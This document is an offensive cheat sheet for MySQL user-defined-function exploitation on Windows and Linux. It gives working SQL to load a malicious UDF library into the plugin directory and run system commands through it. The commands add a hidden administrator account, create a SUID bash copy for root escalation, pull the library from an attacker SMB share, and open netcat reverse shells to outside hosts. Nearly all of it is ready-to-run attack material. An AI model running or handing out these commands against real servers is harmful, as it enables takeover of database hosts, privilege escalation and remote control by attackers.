MySQL UDF Exploitation Simple Cheat Sheet

There is a TR blog post for this MySQL UDF Exploitations methodology.

Setup for Windows

select @@version_compile_os, @@version_compile_machine;

select @@plugin_dir;

select load_file('\\\\10.0.0.5\\share\\lib_mysqludf_sys_64.dll') into dumpfile "<Plugin-Directory>\\udf.dll";

create function sys_bineval returns int soname 'udf.dll';

create function sys_eval returns string soname 'udf.dll';

select * from mysql.func where name = 'sys_bineval';

select * from mysql.func where name = 'sys_eval';

Execute Commands Samples for Windows

select sys_eval('dir C:\\Users\\4rch\\Desktop\\');

select sys_exec("net user 4rchantos Passwd1 /add");

select sys_exec("net localgroup Administrators 4rchantos /add");

select sys_eval("net use X: \\\\10.0.0.5\\share /user:user passwd");

select sys_eval("C:\\Users\\4rch\\Desktop\\nc.exe -e cmd.exe 192.168.49.125 80");

Setup for Linux

select @@version_compile_os, @@version_compile_machine;

show variables like '%plugin%';

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'));

select * from foo into dumpfile '<Plugin-Directory>/raptor_udf.so';

create function do_system returns integer soname 'raptor_udf.so';

select * from mysql.func;

select do_system('<command>');

Execute Privilege Escalation Commands Samples for Linux

select do_system('cp /bin/bash /tmp/4rch; chmod +xs /tmp/4rch');

/tmp/4rch -p

select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');

\! sh

Execute Command Samples for Linux

select do_system('id > /var/www/output; chown www-data www-data  /var/www/output');

select do_system('nc 10.0.0.5 1337 -e /bin/bash');